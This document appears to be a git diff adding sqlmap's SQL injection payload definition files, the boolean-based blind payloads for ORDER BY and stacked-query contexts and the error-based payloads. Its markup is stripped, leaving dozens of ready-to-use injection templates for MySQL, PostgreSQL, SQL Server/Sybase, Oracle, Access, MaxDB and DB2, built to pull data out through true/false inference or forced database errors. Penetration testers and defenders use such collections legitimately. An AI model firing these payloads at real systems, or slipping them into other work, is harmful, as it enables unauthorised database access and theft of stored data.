+ + + + + PostgreSQL boolean-based blind - ORDER BY clause (GENERATE_SERIES) + 1 + 5 + 1 + + 3 + 1 + ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) + + ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) + + + ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1) + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause + 1 + 3 + 1 + 3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause (original value) + 1 + 4 + 1 + 3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle boolean-based blind - ORDER BY, GROUP BY clause + 1 + 3 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Oracle boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 4 + 1 + 2,3 + 1 + ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + + + ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) + +
+ Oracle +
+
+ + + Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause + 1 + 4 + 1 + 2,3 + 1 + ,IIF([INFERENCE],1,1/0) + + ,IIF([RANDNUM]=[RANDNUM],1,1/0) + + + ,IIF([RANDNUM]=[RANDNUM1],1,1/0) + +
+ Microsoft Access +
+
+ + + Microsoft Access boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 5 + 1 + 2,3 + 1 + ,IIF([INFERENCE],[ORIGVALUE],1/0) + + ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) + + + ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0) + +
+ Microsoft Access +
+
+ + + SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause + 1 + 4 + 1 + 2,3 + 1 + ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END) + + ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END) + + + ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END) + +
+ SAP MaxDB +
+
+ + + SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value) + 1 + 5 + 1 + 2,3 + 1 + ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) + + ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) + + + ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) + +
+ SAP MaxDB +
+
+ + + IBM DB2 boolean-based blind - ORDER BY clause + 1 + 4 + 1 + 3 + 1 + ,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + +
+ IBM DB2 +
+
+ + + IBM DB2 boolean-based blind - ORDER BY clause (original value) + 1 + 5 + 1 + 3 + 1 + ,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + + + ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) + +
+ IBM DB2 +
+
+ + + + HAVING boolean-based blind - WHERE, GROUP BY clause + 1 + 3 + 1 + 1,2 + 1 + HAVING [INFERENCE] + + HAVING [RANDNUM]=[RANDNUM] + + + HAVING [RANDNUM]=[RANDNUM1] + + + + + + + MySQL >= 5.0 boolean-based blind - Stacked queries + 1 + 4 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + # + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + +
+ MySQL + >= 5.0 +
+
+ + + MySQL < 5.0 boolean-based blind - Stacked queries + 1 + 5 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + # + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) + +
+ MySQL + < 5.0 +
+
+ + + PostgreSQL boolean-based blind - Stacked queries + 1 + 3 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + -- + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) + +
+ PostgreSQL +
+
+ + + + PostgreSQL boolean-based blind - Stacked queries (GENERATE_SERIES) + 1 + 5 + 1 + 1-8 + 1 + ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1 + + ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1 + -- + + + ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1 + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF) + 1 + 3 + 1 + 1-8 + 1 + ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + + ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + -- + + + ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase boolean-based blind - Stacked queries + 1 + 4 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) + -- + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle boolean-based blind - Stacked queries + 1 + 4 + 1 + 1-8 + 1 + ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL + -- + + + ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL + +
+ Oracle +
+
+ + + Microsoft Access boolean-based blind - Stacked queries + 1 + 5 + 1 + 1-8 + 1 + ;IIF([INFERENCE],1,1/0) + + ;IIF([RANDNUM]=[RANDNUM],1,1/0) + %16 + + + ;IIF([RANDNUM]=[RANDNUM1],1,1/0) + +
+ Microsoft Access +
+
+ + + SAP MaxDB boolean-based blind - Stacked queries + 1 + 5 + 1 + 1-8 + 1 + ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END + + ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END + -- + + + ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END + +
+ SAP MaxDB +
+
+ +
diff --git a/src/sqlmap-master/data/xml/payloads/error_based.xml b/src/sqlmap-master/data/xml/payloads/error_based.xml new file mode 100644 index 0000000..0d717f9 --- /dev/null +++ b/src/sqlmap-master/data/xml/payloads/error_based.xml @@ -0,0 +1,1538 @@ + + + + + + MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED) + 2 + 4 + 1 + 1,2,3,8,9 + 1 + AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + + MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED) + 2 + 4 + 3 + 1,8,9 + 1 + OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP) + 2 + 4 + 1 + 1,2,3,8,9 + 1 + AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) + + AND EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP) + 2 + 4 + 3 + 1,8,9 + 1 + OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)) + + OR EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.5 +
+
+ + + MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) + 2 + 4 + 1 + 1,2,3,8,9 + 1 + AND GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + AND GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + + MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET) + 2 + 4 + 3 + 1,8,9 + 1 + OR GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM]) + + OR GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.6 +
+
+ + + MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS) + 2 + 5 + 1 + 1,2,3,8,9 + 1 + AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) + + AND JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.7.8 +
+
+ + + + MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS) + 2 + 5 + 3 + 1,8,9 + 1 + OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))) + + OR JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.7.8 +
+
+ + + MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 2 + 1 + 1,2,3,8,9 + 1 + AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 2 + 3 + 1,2,3,8,9 + + 1 + OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.0 (inline) error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 5 + 1 + 7 + 1 + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.0 +
+
+ + + MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) + 2 + 1 + 1 + 1,2,3,8,9 + 1 + AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) + + + AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) + 2 + 1 + 3 + 1,2,3,8,9 + + 1 + OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) + + + OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML) + 2 + 3 + 1 + 1,2,3,8,9 + 1 + AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) + + + AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML) + 2 + 3 + 3 + 1,2,3,8,9 + + 1 + OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) + + + OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 5.1 +
+
+ + + MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) + 2 + 3 + 1 + 1,2,3,8,9 + 1 + AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) + + + AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 4.1 +
+
+ + + + MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR) + 2 + 3 + 3 + 1,8,9 + 1 + OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) + + + OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL + >= 4.1 +
+
+ + + + MySQL OR error-based - WHERE or HAVING clause (FLOOR) + 2 + 4 + 3 + 1,8,9 + 2 + OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) + + OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) + # + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ MySQL +
+
+ + + PostgreSQL AND error-based - WHERE or HAVING clause + 2 + 1 + 1 + 1,8,9 + 1 + AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) + + AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + PostgreSQL OR error-based - WHERE or HAVING clause + 2 + 1 + 3 + 1,8,9 + 2 + OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) + + OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ PostgreSQL +
+
+ + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) + 2 + 1 + 1 + 1,8,9 + 1 + AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN) + 2 + 2 + 3 + 1,8,9 + 2 + OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT) + 2 + 2 + 1 + 1,8,9 + 1 + AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT) + 2 + 3 + 3 + 1,8,9 + 2 + OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONCAT) + 2 + 2 + 1 + 1,8,9 + 1 + AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') + + AND [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONCAT) + 2 + 3 + 3 + 1,8,9 + 2 + OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]') + + OR [RANDNUM]=CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]') + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase +
+
+ + + Oracle AND error-based - WHERE or HAVING clause (XMLType) + 2 + 1 + 1 + 1,9 + 1 + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
+ + + Oracle OR error-based - WHERE or HAVING clause (XMLType) + 2 + 1 + 3 + 1,9 + 2 + OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Oracle +
+
